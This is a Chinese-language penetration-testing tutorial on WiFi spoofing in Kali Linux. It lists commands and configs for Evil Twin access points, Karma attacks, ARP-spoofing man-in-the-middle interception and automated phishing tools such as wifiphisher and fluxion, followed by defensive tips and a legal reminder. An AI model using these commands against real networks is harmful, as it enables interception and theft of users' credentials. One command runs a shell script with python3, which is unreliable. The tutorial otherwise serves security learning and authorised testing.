在 Kali Linux 中,**WiFi 欺骗攻击**(如 Evil Twin、Karma 攻击、中间人攻击等)是常见的渗透测试技术,用于评估无线网络的安全性。以下是常用的 **WiFi 欺骗攻击方法及工具**,涵盖 **伪造热点、流量劫持、钓鱼攻击** 等技术。
**1. Evil Twin(恶意双胞胎)攻击**
**原理**:伪造一个与目标 WiFi 同名的热点,诱使用户连接,进而窃取数据或进行钓鱼攻击。
**工具**:
**(1) `hostapd` + `dnsmasq`(手动搭建)**
```bash
1. 设置无线网卡为监听模式
airmon-ng start wlan0
2. 创建虚拟热点(需修改配置文件)
hostapd /path/to/hostapd.conf
```
**`hostapd.conf` 示例**:
```ini
interface=wlan0
driver=nl80211
ssid=Free_WiFi
channel=6
hw_mode=g
```
**`dnsmasq.conf` 示例**:
```ini
interface=wlan0
dhcp-range=10.0.0.10,10.0.0.100,255.255.255.0,12h
```
**作用**:
-
`hostapd` 创建虚假 AP
-
`dnsmasq` 提供 DHCP 服务
**(2) `airbase-ng`(Aircrack-ng 套件)**
```bash
1. 创建虚假 AP(-e 设置 SSID)
airbase-ng -e "Free_WiFi" -c 6 wlan0mon
```
**适用场景**:
- 快速搭建 Evil Twin,但需手动配置 DHCP 和 NAT 转发。
**(3) `wifiphisher`(自动化钓鱼)**
```bash
wifiphisher --essid "Free_WiFi" -j
```
**特点**:
-
自动创建 Evil Twin + 钓鱼页面(如登录页面、固件升级页面)。
-
支持 **WPA3 钓鱼**(需额外配置)。
**2. Karma 攻击(自动响应 Probe 请求)**
**原理**:监听客户端发送的 Probe 请求(如手机自动搜索已保存的 WiFi),并伪造同名热点诱骗连接。
**工具**:
**(1) `mana-toolkit`**
```bash
1. 安装
apt install mana-toolkit
2. 启动 Karma 攻击
python3 /usr/share/mana-toolkit/run-mana/start-nat-full.sh
```
**特点**:
-
自动响应所有 Probe 请求(如 `Starbucks_WiFi`)。
-
可结合 `ettercap` 进行 MITM 攻击。
**(2) `hostapd-mana`(增强版 hostapd)**
```bash
hostapd-mana /path/to/hostapd-mana.conf
```
**适用场景**:
- 比 `mana-toolkit` 更轻量,适合长期监听。
**3. 中间人攻击(MITM)**
**目标**:劫持 WiFi 客户端流量,窃取敏感信息(如密码、Cookie)。
**工具**:
**(1) `ettercap`(ARP 欺骗)**
```bash
ettercap -T -i wlan0 -M arp:remote /192.168.1.1// /192.168.1.100//
```
**作用**:
-
欺骗客户端和路由器,劫持流量。
-
可结合 `sslstrip` 降级 HTTPS 流量(部分场景失效)。
**(2) `bettercap`(现代 MITM 工具)**
```bash
bettercap -iface wlan0
```
**功能**:
-
支持 **WiFi 嗅探、ARP 欺骗、DNS 劫持、HTTPS 中间人**。
-
可自动钓鱼(如伪造登录页面)。
**(3) `mitmproxy`(HTTPS 流量分析)**
```bash
mitmproxy --mode transparent --showhost
```
**适用场景**:
- 解密 HTTPS 流量(需客户端安装恶意证书)。
**4. 自动化 WiFi 欺骗框架**
**(1) `fluxion`(图形化钓鱼)**
```bash
git clone https://github.com/FluxionNetwork/fluxion.git
cd fluxion && ./fluxion.sh
```
**特点**:
- 提供图形化界面,支持 Evil Twin + 钓鱼页面(如伪造 WiFi 登录)。
**(2) `linset`(西班牙语界面)**
```bash
git clone https://github.com/vk496/linset.git
cd linset && ./linset
```
**适用场景**:
- 类似 `fluxion`,但更轻量。
**5. 防御方法(蓝队视角)**
-
**禁用 Probe 请求**(减少 Karma 攻击风险)。
-
**使用 WPA3-Enterprise**(避免 Evil Twin)。
-
**监控异常 AP**(如 `airodump-ng` 检测同名热点)。
-
**强制 HTTPS**(防止 `sslstrip` 攻击)。
-
**客户端证书认证**(防止 MITM)。
**法律与道德提醒**
-
**仅限授权测试**,未经许可攻击他人 WiFi 属违法行为。
-
红队演练需签署 **授权协议**,遵守《网络安全法》。
**总结**
| **攻击类型** | **工具** | **适用场景** |
|--------------------|-------------------------|----------------------------------|
| Evil Twin | `hostapd`, `wifiphisher` | 伪造热点 + 钓鱼 |
| Karma 攻击 | `mana-toolkit` | 自动响应 Probe 请求 |
| MITM(流量劫持) | `bettercap`, `ettercap` | ARP 欺骗、HTTPS 解密 |
| 自动化钓鱼 | `fluxion`, `linset` | 图形化 WiFi 钓鱼攻击 |
学习时建议在 **虚拟机或授权环境** 测试,避免法律风险。